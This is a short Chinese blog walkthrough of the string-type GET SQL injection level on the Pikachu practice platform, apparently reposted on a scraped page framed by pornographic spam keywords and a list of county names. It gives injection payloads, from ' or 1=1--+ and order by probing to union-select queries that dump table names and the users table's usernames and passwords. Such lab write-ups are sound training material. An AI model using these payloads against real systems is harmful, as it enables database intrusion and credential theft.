国产精品天干天干,亚洲毛片在线,日韩gay小鲜肉啪啪18禁,女同Gay自慰喷水

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection字符型注入(get)通關(guān)指南pika~pika~

2023-03-09 00:28 作者:Yukito_online  | 我要投稿

ok,廢話不多說,上菜!

字符型注入的檢測方式和數(shù)字型差不多只是多加了一個(gè)引號有時(shí)還需要閉合括號

burp和postman我懶得開了,hackbar就夠了,可以去Firefox擴(kuò)展商店下載一個(gè)

注入點(diǎn)在name參數(shù)

輸入‘報(bào)錯(cuò),表示存在字符型注入

輸入' or 1=1--+輸出全部用戶,繼續(xù)用order by判斷字段

' order by 3--+時(shí)報(bào)錯(cuò)說明存在兩個(gè)字段

下面就是跟整數(shù)型一樣,拿庫名拿表名拿列名拿數(shù)據(jù)


' union select version(),database()--+
' union select 1,table_name from information_schema.tables where table_schema='pikachu'
' union select 1,column_name from information_schema.columns where table_name='users'--+
' union select username,password from users--+

收工,睡覺

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection字符型注入(get)通關(guān)指南pika~pika~的評論 (共 條)

分享到微博請遵守國家法律
疏勒县| 博客| 中方县| 青海省| 密云县| 东阿县| 镇平县| 化德县| 林州市| 德钦县| 南开区| 睢宁县| 桃江县| 布尔津县| 连云港市| 方城县| 含山县| 广丰县| 简阳市| 澄城县| 中宁县| 安泽县| 普兰店市| 安吉县| 嵊泗县| 大新县| 根河市| 永年县| 湾仔区| 达日县| 康马县| 宣威市| 兴山县| 高密市| 天台县| 阿坝县| 兰考县| 仙居县| 台北市| 雷山县| 攀枝花市|